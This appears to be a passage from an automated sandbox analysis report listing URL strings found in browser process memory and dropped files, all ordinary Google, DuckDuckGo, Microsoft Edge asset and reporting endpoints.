Source: aieukn.13.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Reporting and NEL.24.dr	String found in binary or memory: https://deff.nelreports.net/api/report
Source: Reporting and NEL.24.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.24.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chromecache_473.19.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log7.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log7.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log7.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log7.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr, HubApps Icons.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log7.23.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	String found in binary or memory: https://gaana.com/
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%
